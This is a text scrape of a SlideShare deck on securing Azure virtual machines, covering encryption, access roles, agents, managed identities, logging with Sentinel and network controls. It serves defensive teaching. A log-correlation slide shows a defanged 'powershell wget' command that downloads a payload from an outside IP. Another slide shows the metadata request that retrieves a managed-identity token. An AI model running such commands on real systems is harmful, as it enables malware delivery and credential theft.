SlideShare a Scribd company logo
1 of 31
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
github.com/msugn
Securing Virtual
Machine Workloads
in Azure
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Who am I?
@msandbu
Linkedin.com/msandbu
Marius Sandbu
Cloud Evangelist @ Sopra Steria
msandbu.org
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Agenda
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Over 18 000
criticital
vulnerabilities
reported in 2021
80 % of all
ransomware aimed
at end-users
$LAPSUS «hacked»
Samsung, NVIDIA,
Microsoft og Okta
Ransomware attack
«attempts» every 11
seconds
Crititical
Vulnerabilities slike
PrintNightmare, new
RPC CVE and browsers
(w/Extensions)
On average 30 – 60
days to patch in an
organization
DDoS attack measures
at 3,47 TBps against
Azure
2021/2022 – The years we got new sad records...
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Storage Disk
VM01
Read/Write
SSE
(Storage Service Encryption)
Platform Managed Keys
• All data encrypted physically on storage
nodes with Bitlocker
• Keys Managed by Microsoft
• (Platform Managed Keys – PMK)
• Customer-Managed (CMK) keys using
Azure KeyVault
• Can also deploy KeyVault with dedicated
HSM solution
• Ensures securing disks physically in the
datacenter
Physical Server
Generation 1
Storage Disk
SSE
(Storage Service Encryption)
Customer Managed Keys
Disk Encryption
Or...
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Storage Disk
VM01 Read/Write
SSE
(Storage Service Encryption)
Platform Managed Keys
• Azure Disk Encryption for encryption of
VHD files and OS
• Adds 3 – 5% CPU usage
• Confidential Computing for encryption
of working memory of the VM
• AMD SEV-SNP or Intel SGX
• Intel SGX requires rewriting of applications
to use new CPU instructions
• AMD SEV-SNP does not require
modifications
AMD SEV-SNP
Confidential
Computing
Minne
Kryptert miljø
Disk and OS Encryption
ADE
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Gen 1 vs Gen 2 - VM
Feature Generation 1 VM Generation 2 VM
Boot type PCAT UEFI
Disk Controllers IDE SCSI
VM Typer Almost everyone Almost everyone
OS Disk > 2 TB No Yes
Price difference? No No
Support VHDX? No No
VBS NO Yes
Trusted Launch No Yes
vTPM NO Yes
• Use Gen 2 wherever possible!
• Cannot migrate from Gen 1 to Gen 2
• Solution? Create new VM with existing
source disk
• Not all VM types support Gen 2 yet
• Some GPU instances
• VBS = Support for:
• Credential Guard
• Trusted Boot (does not work with Site Recovery or
Shared/Ultra Disks)
• Application Guard
• VM Attestation service
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Azure infrastruktur
Physical Server
Storage Disk
Physical Server
VM01
Azure infrastruktur
Availability Zone #1 – Region X
Azure Resource Manager
(RDFE)
Azure Fabric Controller (Service
Fabric)
Microsoft.Storage RP
Microsoft.Compute RP
Fabric Agent
Fabric Agent
{ "Name": "Virtual Machine Operator",
"Id": "88888888-8888-8888-8888-
888888888888",
"IsCustom": true,
"Description":
"Actions": [
"Microsoft.Storage/*/read",
"Microsoft.Network/*/read",
"Microsoft.Compute/*/read",
"NotActions": [],
"DataActions": [],
"NotDataActions": [],
"AssignableScopes": [
"/subscriptions/{subscriptionId1}",
"/subscriptions/{subscriptionId2}",] }
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Azure Access
• Access is managed against Azure
Resource Providers
• Operations include
Read/write/action/delete/*
• Access can be defined on different
levels
• Management Group
• Subscription
• Resource Group
• Ressurs
• Remember Global Admin  User
Access Administrator
• PIM, Access Packages or CloudKnox
for elevation of access
"roleName": "Virtual Machine Contributor",
"actions": [
"Microsoft.Authorization/*/read",
"Microsoft.Compute/availabilitySets/*",
"Microsoft.Compute/locations/*",
"Microsoft.Compute/virtualMachines/*",
"Microsoft.Compute/disks/write",
"Microsoft.Compute/disks/delete",
"Microsoft.DevTestLab/schedules/*",
"Microsoft.Insights/alertRules/*",
"Microsoft.Network/applicationGateways/backendAddressPools/join/action",
"Microsoft.Network/loadBalancers/backendAddressPools/join/action",
"Microsoft.Network/loadBalancers/inboundNatPools/join/action",
"Microsoft.Network/loadBalancers/inboundNatRules/join/action",
"Microsoft.Network/loadBalancers/probes/join/action",
"Microsoft.Network/loadBalancers/read",
"Microsoft.Network/locations/*",
"Microsoft.Network/networkInterfaces/*",
"Microsoft.Network/networkSecurityGroups/join/action",
"Microsoft.Network/networkSecurityGroups/read",
"Microsoft.Network/publicIPAddresses/join/action",
"Microsoft.Network/publicIPAddresses/read",
"Microsoft.Network/virtualNetworks/read",
"Microsoft.Network/virtualNetworks/subnets/join/action",
"Microsoft.RecoveryServices/locations/*",
"Microsoft.RecoveryServices/Vaults/backupFabrics/backupProtectionIntent/write",
"Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/protectedItems/*/read",
"Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/protectedItems/read",
"Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/protectedItems/write",
"Microsoft.RecoveryServices/Vaults/backupPolicies/read",
"Microsoft.RecoveryServices/Vaults/backupPolicies/write",
"Microsoft.RecoveryServices/Vaults/write",
"Microsoft.ResourceHealth/availabilityStatuses/read",
"Microsoft.Resources/deployments/*",
"Microsoft.Resources/subscriptions/resourceGroups/read",
"Microsoft.SerialConsole/serialPorts/connect/action",
"Microsoft.SqlVirtualMachine/*",
"Microsoft.Storage/storageAccounts/listKeys/action",
"Microsoft.Storage/storageAccounts/read",
"Microsoft.Support/*"
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Access
• Permissions should only be
temporary
• Can also make custom Azure Roles
using JSON based template
• Access over a longer period
should be handled using Access
Review
• Does user still require access after two
months?
• Group based access please
Access Packages:
- SharePoint Sites
- Azure AD Applications
- Azure AD Grupper og Teams
Privileged Identity Management
- Azure AD Roller
- Azure Resource Manager Roller (Custom Roles)
- Kan defineres på ulike scope (Ressurs gruppe, Sub, MG)
CloudKnox (Kommer snart..ja veldig snart)
- Azure Resource Manager (Provider Tilganger)
- Basert på historisk tilganger
- Andre skyleverandører
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Azure Agents for virtual machines
• To guest agents by default
• Provisioning Agent
• Windows Guest Agent
• PA Agent needs to be installed to properly
start VM.
• Doomsday – 13 Oktober 2021
• Windows Guest Agent used for many
different features
• DNS lookup
• Extension installation
• Snapshot backup
• Runs as local system on machine
• Extensions collected from Azure Blob
Storage via 168.63.129.16
168.63.129.16:80
168.63.129.16:32526
Windows Machine in
Azure
Windows Azure Guest
Agent
HTTP GET /
machine?comp=goalstate
Compute Resource
Provider
(Service Fabric
Cluster)
Status (Ready)
AppAgentRuntime
169.254.169.254
Azure Instance
Metadata Service HTTP GET /metadata/
instance?api-version
HTTP POST /healthservice
DNS
Manifest files
WireServer
az vm extension set  --resource-group myResourceGroup  --vm-name
myVM  --name DependencyAgentLinux  --publisher
Microsoft.Azure.Monitoring.DependencyAgent  --version 9.5  --enable-
auto-upgrade true
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Extensions and Run Commands
• Runs also as context of local system
account
• No way to remove the features
• Only permission needed is
• Microsoft.Compute/virtualMachines/runCommand/action
• Accessible by Virtual Machine Contributer
• Requires Public IP access to Azure from
VM
• Managed Run Commands in Preview
• Parallel execution of multiple scripts
• Support for long running scripts
Example: Set-ADAccountPassword -Identity user03 -
NewPassword $NewPwd -Reset
Log path:
C:WindowsAzureLogsPluginsMicrosoft.CPlat.Core.RunCom
mandWindows
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Managed Identities
• Provides VMs with their own Azure
AD Identity
• Lives and dies with the VM
• Commonly used for authentication
to other Azure Services
• Kubernetes
• SQL
• What kind of permissions does the
managed identities actually have?
• GET:
'http://169.254.169.254/metadata/ide
ntity/oauth2/token?api-version=2018-
02-
01&resource=https://management.azu
re.com/' HTTP/1.1 Metadata: true
Example: Azure Resource Graph: // SAMI = System-assigned Managed Identity
// UAMI = User-assigned Managed Identity
// Sjekker om VM eller VMSS har SAMI eller UAMI
resources
| join kind=leftouter(
resourcecontainers
| where type=='microsoft.resources/subscriptions'
| project subscriptionName=name, subscriptionId
) on subscriptionId
| where type =~ "microsoft.compute/virtualmachines" or
type =~ "microsoft.compute/virtualMachineScaleSets"
| extend identityType = identity.type
| extend hasManagedIdentity = iff(identity == "", "No", "Yes"),
isSystemAssignedEnable = iff(identityType contains "SystemAssigned", "Yes",
"No")
| project subscriptionId,
subscriptionName,
name,
resourceGroup,
identityType,
hasManagedIdentity,
isSystemAssignedEnable
Remember to turn on Azure AD Diagnostics
logging
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Managed Identities and Azure AD Join
• Azure AD Join supported for Linux
and Windows (Server 2019 and
later)
• Virtual Machine Administrator or
User logon access required to logon
machine
• Dsregcmd /status and /leave good
commands to remember
• Remember to exclude “Azure
Windows VM Sign-in” from
Conditional Access
• Supported by Azure Bastion via
RDP/SSH with UPN:
AzureADjohn@contoso.com
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Logs and log sources
Audit log Category Enabled as standard Retention
User Activity Microsoft 365 Security No 90 Days (1 year for E5)
Admin Activity Microsoft 365 Security No 90 Days (1 year for E5)
Mailbox Audit Exchange Online Yes 90 Days
Sign-In Activity Azure AD Yes 30 Days (AAD P1)
Users at Risk Azure AD Yes 7 Days (30 Days, P1/P2)
Risky Sign-ins Azure AD Yes 7 Days (30 Days, P1/P2)
Azure MFA Usage Azure AD Yes 30 Days
Directory Audit Azure AD Yes 7 Days (30 Days, P1/P2)
Intune Activity Log Intune Yes 1 Year (Graph API)
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Logs and log sources
Audit Log Category Enabled as standard Retention
Azure Resource Manager Azure Yes 30 Days
Network Security Group Flow
Logs
Azure No Depending on Configuration
Azure Diagnostic Logs Azure No Depending on Configuration
Azure Application Insight Azure No Depending on Configuration
VM Event Logs OS Yes Size defined in Group Policy
Custom Logs OS N/A Application specific logs
Azure Security Center Azure No (Cost per host/PaaS) Depending on Log Analytics
SaaS Usage N/A No Requires Cloud App Discovery
Custom Sources** N/A No Depending on Configuration
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Logging and Monitorering in Azure
Data Collection
Rule
Data Collection
Rule
Security Events
Microsoft Monitoring
Agenten
Log Analytics Workspace
Log Analytics Workspace
w/Sentinel
Application Events
Depedency Agent
• Microsoft Monitoring Agent
(MMA) vs Log Analytics Agent
(Legacy)
• MMA with Data Collection
Rules
• Dependency Agent provides
insight into processes and
network connections
• Custom Log files in Preview
https://bit.ly/3vclP4d
• Sysmon with extra config to
collect even more audit data
SwiftOnSecurity/sysmon-config
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
How to see the full picture?
VM Connection
(VM Insight)
DeviceFileEvents
(Defender for Cloud)
Configuration Change
(Azure Automation)
Security Events
(Microsoft Sentinel via
Log Analytics)
Windows VM i Azure
DeviceProcess
Events (Defender for
Cloud)
8.8.8.8
Inbound
3389
svchost
Russia
8.8.8.8
4624 - An account
was successfully
logged on.
powershell wget
hxxp://209.14.0[.]234:466
13/VcEtrKighyIFS5foGNXH
–file *.zip
Service
Stopped
MpSense
powershell.exe
-ExecutionPolicy
Unrestricted
-Neininteractive
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Log Analytics and Sentinel
Data Flow
Solutions
Network Performance
Monitor
Azure Monitor
for containers
Service Map
Alert Playbooks Azure Security Graph
Threat Intelligence
Machine Learning
Dashboards
Visualization
Hunting
Queries
Jupyter
Notebooks
Sentinel ITSM Connector
Update
Management
Data Collector
Pipeline time
Indexing time
Surge Protection
New Data Source
Log Analytics
Workspace
Retention: 90 days
Data Collector
API
Temporary Storage
Solution Collection Interval
Azure Diagnostics 2 – min
Network Performance Monitor 3 min
Windows Update Analytics (24 hours)
Metric Collector
API
SQL Server (7 days)
Agent Collection
API Endpoint
Purge API
Analytics
Rules
• Log Analytics – Extra Solutions:
• DNS Insight
• Antimalware assessment
• Basic and Analytics Logs (In
preview)
• Sentinel with connectors to
collect security events
• Either Sentinel or Defender for
Servers
• Microsoft Defender support is in
Preview
• (for data collection)
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Example Query
let IP = (externaldata(ip:string)
[@"https://rules.emergingthreats.net/blockrules/compromised-ips.txt",
@"https://raw.githubusercontent.com/stamparm/ipsum/master/levels/5.txt",
@"https://cinsscore.com/list/ci-badguys.txt",
@"https://infosec.cert-pa.it/analyze/listip.txt",
@"https://feodotracker.abuse.ch/downloads/ipblocklist_recommended.txt"
]
with(format="csv")
| where ip matches regex "(^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-
| distinct ip
);
(union isfuzzy=true
(SecurityEvent
| where IpAddress in (IP)
| extend Ip = IpAddress, User = Account
),
(VMConnection
| where SourceIp in (IP)
| extend Ip = SourceIp
| where LinksLive == 1
),
(SigninLogs
| where IPAddress in (IP)
| extend Ip = IPAddress, User = UserPrincipalName
))
External Sources
Regex Magic
Map it against table
SecurityEvent
Map it against table
VMConnection
Map it against table
SignInLogs
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Azure Backup
• Azure Backup for virtual
machines
Also adding support for multiple backup
points yeah day (Enhanced Policy)
• Now support for Archive Tier for
backup (monthly and yearly)
• Resource Guard – Ensure that
backup admin cannot delete
backup data
• Are also some third party
alternatives
• Example: Veeam Azure for VM
• Example: Velero/Kasten for AKS
Kontakt for tilgang til preview  askazurebackupteam@microsoft.com
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Update Management
Azure Automation
Log Analytics Workspace
Microsoft
Update
Log Analytics
Agenten
Hybrid
Runbook
Worker
• Does not support Optional
Updates (Example: SQL Service
Packs)
• New version coming here soon!
• Does not support Windows Clients
OS (Requires Intune or others)
• Updates collected from the source
defined on machine.
• HotPatching - Server 2022 – Azure
Edition
• SMB over QUIC (SMB over UDP)
• Extended Networking
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
AutoManage
• Predefined profiles for
management
• Production or Dev/test
• Backup not activiated for
dev/test
• Guest Configuration Baseline
• Azure Policy
• Not support in Norway East yet...
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Defender for Cloud and Servers
• Microsoft and third-party vulnerability
management
• Microsoft or Qualys
• Software Inventory
• IPFIX monitoring or known «bad» traffic
• Requries a service with public IP or LB
• Lisens for Defender for Endpoint (EDR) P1
eller P2
• Adaptive Application Control = AppLocker
• Antimalware = free for Azure VM’s
• Innstalled trough Azure Extension
• Custom Solution with Dashboards via Log
Analytics
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Azure Policy – Guest Configuration
• Group Policy for Azure!
• Based upon DSC for Windows / Linux
• Will be replacing DSC in Automation
• GuestConfiguration Extension needs
to be installed (Can also be done by
its own Policy
• Provides machine with its own
managed identity
• (If provisioned via the Azure Portal)
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Network and traffic flow
• DDoS Protection
• Protected OSI Layer 3&4
• Currently expensive
• Protects everything with its own
public IP
• Out of order packets are dropped at
edge
• Azure Firewall
• Layer 4 Statefull firewall
• IPS/IDS and TLS inspection for
east/west traffic
• Threat intelligence
• Support IP Groups
• NSG Regler
• NIC / Subnet
• Service Tags (Five-tuple)
Nettverk Access
Rules:
Allow
Virtuell Maskin
Network Security
Group
Subnet/NIC
Data Collector Interface
Log Analytics
NetworkSecurityGroupEvent
FlowLogs
SecurityEvents
VMConnection
DeviceEvents
DeviceFileEvents
DeviceNetworkEvents
DeviceProcessEvents
Update
ProtectionSTatus
ServiceMap
AzureFirewallApplicationRule
AzureFirewallNetworkRule
AzureFirewallThreatIntelLog
AzureFirewallDnsProxy
Azure Sentinel
Security
Custom Routes
IPSEC Parameters
Security
Network Rules
Application Rules
Threat Intelligence
filtering
IP Groups
IPS/IDS
TLS Inspection
Security
SSL Policy
(Detection/Block)
HTTP Rewrite
Bot Protection
Geo Match
Request size limit
File Exclustion list
WAF OWASP
SQL Injection
Cross-site script
HTTP Request Smugling
HTTP Protocol Violation
Security
IP Restrictions
ServiceTags
Application
Security Groups
Azure
Firewall
Azure
Application
Gateway
Network
Security
Group
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Azure NSG Flow Logs
Traffic Analysis
Network Security
Group
Azure Log Analytics
Storage Account
Microsoft Threat
Intelligence
Data berikelse
Flow Logs:
FlowDirection
SrcIP
DestIP
NSGList
NSGRule
DeniedFlow
AllowedFlow
FlowCount
AzureNetworkAnalytics_CL:
FlowDirection
FlowType
L4Protocol
L7Protocol
NSGRule
DeniedFlow
AllowedFlow
FlowCount
NIC
VM
Subnet
Country
Region
Hver time eller 10
minutt
• Provides Insight into all network
traffic going trough an NSG
• Data enriched by Microsoft
• Is traffic from a «bad» address?
• Is traffic from another Azure service?
• Is traffic from a known location?
• Data will be availble in Log Analytics
• And other fancy dashboards
• Can also use 3.party as Cisco
Stealthwatch
• Example: AzureNetworkAnalytics_CL
| where SubType_s == 'FlowLog’
and FlowType_s == 'MaliciousFlow'
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Who did changes to the VM?!
• Resource Locks
• If you are using IaC you need to
mace some adjustments to ensure
locks are removed before
modification
• Change Analysis
• Gir innsikt i endringer på Azure
ressurser
• Provices access into changes in
Azure changes
• Instead of trying to understanding
all the JSON logic
• Activity Log
• Should still be routed to Log
Analytics for longtime retention
Kusto Query
AzureActivity
| where CategoryValue == "Administrative"
| where ResourceGroup contains "noenoe-rg"
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Access to the virtual machines?
• Offentlig IP?
• NAT IP?
• JIT (Just-in-time access) ?
• Azure Bastion
• Support for native client with standard SKU
• CLI  az network bastion rdp
• Requires Reader Role on VMen
• Fun fact: Based upon Apache Guacamole
• Teleport or Cloudflare Access
• Supports other protocols (TCP/UDP)
• Supports integration with Azure AD
©2022 Microsoft Security User Group Norway All Rights Reserved #MSUGN
@MsSecUGNorway
Cool, so what does it cost?
Example: (per month)
1 VM (4vCPU, 16GB) = 2800,-
• + Storage, network
Azure Backup (250 GB, 30 dager) = 193,-
Azure Defender for 1 server = 120,-
Azure Sentinel (~1-3 GB a month) = 51,-
Azure DDoS (100 IPer) = 25500,-
Azure AD for PIM P2 = 77,-
Azure Traffic Analysis 1GB) = 30,-
Guest Configuration Azure Policy = 52,-
Azure Bastion Standard SKU = 1834,-
Azure Automation (Free for 5 nodes)
Totalt = 27857,- (+ 2800) for the one machine)
But! Some big adjustments happening here soon
Securing Virtual Machines in Microsoft Azure

More Related Content

What's hot

Harnessing the Power of Optimizer Hints
Harnessing the Power of Optimizer HintsHarnessing the Power of Optimizer Hints
Harnessing the Power of Optimizer HintsMaria Colgan
 
Best Practices in Security with PostgreSQL
Best Practices in Security with PostgreSQLBest Practices in Security with PostgreSQL
Best Practices in Security with PostgreSQLEDB
 
Reusable, composable, battle-tested Terraform modules
Reusable, composable, battle-tested Terraform modulesReusable, composable, battle-tested Terraform modules
Reusable, composable, battle-tested Terraform modulesYevgeniy Brikman
 
Oracle Enterprise Manager
Oracle Enterprise ManagerOracle Enterprise Manager
Oracle Enterprise ManagerBob Rhubart
 
Azure virtual machines & Terraform
Azure virtual machines  & Terraform Azure virtual machines  & Terraform
Azure virtual machines & Terraform Juan Jose Gazzola
 
Securing Prometheus exporters using HashiCorp Vault
Securing Prometheus exporters using HashiCorp VaultSecuring Prometheus exporters using HashiCorp Vault
Securing Prometheus exporters using HashiCorp VaultBram Vogelaar
 
PostgreSQL for Oracle Developers and DBA's
PostgreSQL for Oracle Developers and DBA'sPostgreSQL for Oracle Developers and DBA's
PostgreSQL for Oracle Developers and DBA'sGerger
 
Data Migration to Azure SQL and Azure SQL Managed Instance - June 19 2020
Data Migration to Azure SQL and Azure SQL Managed Instance - June 19 2020Data Migration to Azure SQL and Azure SQL Managed Instance - June 19 2020
Data Migration to Azure SQL and Azure SQL Managed Instance - June 19 2020Timothy McAliley
 
Terraform modules and (some of) best practices
Terraform modules and (some of) best practicesTerraform modules and (some of) best practices
Terraform modules and (some of) best practicesAnton Babenko
 
Azure SQL Database
Azure SQL DatabaseAzure SQL Database
Azure SQL Databaserockplace
 
Infrastructure-as-Code (IaC) Using Terraform (Advanced Edition)
Infrastructure-as-Code (IaC) Using Terraform (Advanced Edition)Infrastructure-as-Code (IaC) Using Terraform (Advanced Edition)
Infrastructure-as-Code (IaC) Using Terraform (Advanced Edition)Adin Ermie
 
Google Cloud Platform Training | Introduction To GCP | Google Cloud Platform ...
Google Cloud Platform Training | Introduction To GCP | Google Cloud Platform ...Google Cloud Platform Training | Introduction To GCP | Google Cloud Platform ...
Google Cloud Platform Training | Introduction To GCP | Google Cloud Platform ...Edureka!
 
Apache Hadoop Security - Ranger
Apache Hadoop Security - RangerApache Hadoop Security - Ranger
Apache Hadoop Security - RangerIsheeta Sanghi
 
Configuration management with puppet
Configuration management with puppetConfiguration management with puppet
Configuration management with puppetJakub Stransky
 

What's hot (20)

Terraform on Azure
Terraform on AzureTerraform on Azure
Terraform on Azure
 
Harnessing the Power of Optimizer Hints
Harnessing the Power of Optimizer HintsHarnessing the Power of Optimizer Hints
Harnessing the Power of Optimizer Hints
 
Best Practices in Security with PostgreSQL
Best Practices in Security with PostgreSQLBest Practices in Security with PostgreSQL
Best Practices in Security with PostgreSQL
 
Reusable, composable, battle-tested Terraform modules
Reusable, composable, battle-tested Terraform modulesReusable, composable, battle-tested Terraform modules
Reusable, composable, battle-tested Terraform modules
 
Oracle Enterprise Manager
Oracle Enterprise ManagerOracle Enterprise Manager
Oracle Enterprise Manager
 
Azure virtual machines & Terraform
Azure virtual machines  & Terraform Azure virtual machines  & Terraform
Azure virtual machines & Terraform
 
Securing Prometheus exporters using HashiCorp Vault
Securing Prometheus exporters using HashiCorp VaultSecuring Prometheus exporters using HashiCorp Vault
Securing Prometheus exporters using HashiCorp Vault
 
Infrastructure as Code (IaC)
Infrastructure as Code (IaC)Infrastructure as Code (IaC)
Infrastructure as Code (IaC)
 
PostgreSQL for Oracle Developers and DBA's
PostgreSQL for Oracle Developers and DBA'sPostgreSQL for Oracle Developers and DBA's
PostgreSQL for Oracle Developers and DBA's
 
Data Migration to Azure SQL and Azure SQL Managed Instance - June 19 2020
Data Migration to Azure SQL and Azure SQL Managed Instance - June 19 2020Data Migration to Azure SQL and Azure SQL Managed Instance - June 19 2020
Data Migration to Azure SQL and Azure SQL Managed Instance - June 19 2020
 
Oracle Audit Vault and Database Vault のご紹介
Oracle Audit Vault and Database Vault のご紹介Oracle Audit Vault and Database Vault のご紹介
Oracle Audit Vault and Database Vault のご紹介
 
02 terraform core concepts
02 terraform core concepts02 terraform core concepts
02 terraform core concepts
 
Terraform modules and (some of) best practices
Terraform modules and (some of) best practicesTerraform modules and (some of) best practices
Terraform modules and (some of) best practices
 
Azure SQL Database
Azure SQL DatabaseAzure SQL Database
Azure SQL Database
 
Terraform
TerraformTerraform
Terraform
 
Infrastructure-as-Code (IaC) Using Terraform (Advanced Edition)
Infrastructure-as-Code (IaC) Using Terraform (Advanced Edition)Infrastructure-as-Code (IaC) Using Terraform (Advanced Edition)
Infrastructure-as-Code (IaC) Using Terraform (Advanced Edition)
 
Google Cloud Platform Training | Introduction To GCP | Google Cloud Platform ...
Google Cloud Platform Training | Introduction To GCP | Google Cloud Platform ...Google Cloud Platform Training | Introduction To GCP | Google Cloud Platform ...
Google Cloud Platform Training | Introduction To GCP | Google Cloud Platform ...
 
Apache Hadoop Security - Ranger
Apache Hadoop Security - RangerApache Hadoop Security - Ranger
Apache Hadoop Security - Ranger
 
DevOps for database
DevOps for databaseDevOps for database
DevOps for database
 
Configuration management with puppet
Configuration management with puppetConfiguration management with puppet
Configuration management with puppet
 

Similar to Securing Virtual Machines in Microsoft Azure

Active Directory and Virtualization
Active Directory and VirtualizationActive Directory and Virtualization
Active Directory and VirtualizationAniket Pandey
 
Microsoft Azure : Hey ITPRo's Meet Azure .. .again!
Microsoft Azure : Hey ITPRo's Meet Azure .. .again!Microsoft Azure : Hey ITPRo's Meet Azure .. .again!
Microsoft Azure : Hey ITPRo's Meet Azure .. .again!Mike Martin
 
azure track -03- it pros meet azure - again
azure track -03- it pros meet azure - againazure track -03- it pros meet azure - again
azure track -03- it pros meet azure - againITProceed
 
Enter The Matrix Securing Azure’s Assets
Enter The Matrix Securing Azure’s AssetsEnter The Matrix Securing Azure’s Assets
Enter The Matrix Securing Azure’s AssetsBizTalk360
 
Building Azure RemoteApp - Microsoft Campus Days 2014
Building Azure RemoteApp - Microsoft Campus Days 2014Building Azure RemoteApp - Microsoft Campus Days 2014
Building Azure RemoteApp - Microsoft Campus Days 2014Morgan Simonsen
 
Massive Lift & Shift Migrations to Microsoft Azure with the Microsoft Migrati...
Massive Lift & Shift Migrations to Microsoft Azure with the Microsoft Migrati...Massive Lift & Shift Migrations to Microsoft Azure with the Microsoft Migrati...
Massive Lift & Shift Migrations to Microsoft Azure with the Microsoft Migrati...Morgan Simonsen
 
Enabling Cognitive Workloads on the Cloud: GPUs with Mesos, Docker and Marath...
Enabling Cognitive Workloads on the Cloud: GPUs with Mesos, Docker and Marath...Enabling Cognitive Workloads on the Cloud: GPUs with Mesos, Docker and Marath...
Enabling Cognitive Workloads on the Cloud: GPUs with Mesos, Docker and Marath...Indrajit Poddar
 
Azure Site Recovery Bootcamp
Azure Site Recovery BootcampAzure Site Recovery Bootcamp
Azure Site Recovery BootcampAsaf Nakash
 
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptxConfidential Computing in Azure - SlideShare Ed Dec 2022.pptx
Confidential Computing in Azure - SlideShare Ed Dec 2022.pptxCarlo Sacchi
 
2020-02-10 Java on Azure Solution Briefing
2020-02-10 Java on Azure Solution Briefing2020-02-10 Java on Azure Solution Briefing
2020-02-10 Java on Azure Solution BriefingEd Burns
 
Deep Dive OpenShitt on Azure & .NET Core on OpenShift
Deep Dive OpenShitt on Azure & .NET Core on OpenShiftDeep Dive OpenShitt on Azure & .NET Core on OpenShift
Deep Dive OpenShitt on Azure & .NET Core on OpenShiftTakayoshi Tanaka
 
Az 104 session 3 azure compute
Az 104 session 3 azure compute Az 104 session 3 azure compute
Az 104 session 3 azure compute AzureEzy1
 
Microsoft Windows Server 2022 Overview
Microsoft Windows Server 2022 OverviewMicrosoft Windows Server 2022 Overview
Microsoft Windows Server 2022 OverviewDavid J Rosenthal
 
SCCM on Microsoft Azure
SCCM on Microsoft AzureSCCM on Microsoft Azure
SCCM on Microsoft AzureMohamed Tawfik
 
Windows Azure IaaS and Hybrid
Windows Azure IaaS and HybridWindows Azure IaaS and Hybrid
Windows Azure IaaS and HybridMike Martin
 
Llunitebe2018 best of_two_worlds-manage.your.servers.the.azure.or.configmgr.way
Llunitebe2018 best of_two_worlds-manage.your.servers.the.azure.or.configmgr.wayLlunitebe2018 best of_two_worlds-manage.your.servers.the.azure.or.configmgr.way
Llunitebe2018 best of_two_worlds-manage.your.servers.the.azure.or.configmgr.wayKenny Buntinx
 
Identity Server on Azure: A Reference Architecture
Identity Server on Azure: A Reference ArchitectureIdentity Server on Azure: A Reference Architecture
Identity Server on Azure: A Reference ArchitectureWSO2
 
Az 104 session 8 azure monitoring
Az 104 session 8 azure monitoringAz 104 session 8 azure monitoring
Az 104 session 8 azure monitoringAzureEzy1
 
Azure en Nutanix: your journey to the hybrid cloud
Azure en Nutanix: your journey to the hybrid cloudAzure en Nutanix: your journey to the hybrid cloud
Azure en Nutanix: your journey to the hybrid cloudICT-Partners
 

Similar to Securing Virtual Machines in Microsoft Azure (20)

Windows azure overview for SharePoint Pros
Windows azure overview for SharePoint Pros Windows azure overview for SharePoint Pros
Windows azure overview for SharePoint Pros
 
Active Directory and Virtualization
Active Directory and VirtualizationActive Directory and Virtualization
Active Directory and Virtualization
 
Microsoft Azure : Hey ITPRo's Meet Azure .. .again!
Microsoft Azure : Hey ITPRo's Meet Azure .. .again!Microsoft Azure : Hey ITPRo's Meet Azure .. .again!
Microsoft Azure : Hey ITPRo's Meet Azure .. .again!
 
azure track -03- it pros meet azure - again
azure track -03- it pros meet azure - againazure track -03- it pros meet azure - again
azure track -03- it pros meet azure - again
 
Enter The Matrix Securing Azure’s Assets
Enter The Matrix Securing Azure’s AssetsEnter The Matrix Securing Azure’s Assets
Enter The Matrix Securing Azure’s Assets
 
Building Azure RemoteApp - Microsoft Campus Days 2014
Building Azure RemoteApp - Microsoft Campus Days 2014Building Azure RemoteApp - Microsoft Campus Days 2014
Building Azure RemoteApp - Microsoft Campus Days 2014
 
Massive Lift & Shift Migrations to Microsoft Azure with the Microsoft Migrati...
Massive Lift & Shift Migrations to Microsoft Azure with the Microsoft Migrati...Massive Lift & Shift Migrations to Microsoft Azure with the Microsoft Migrati...
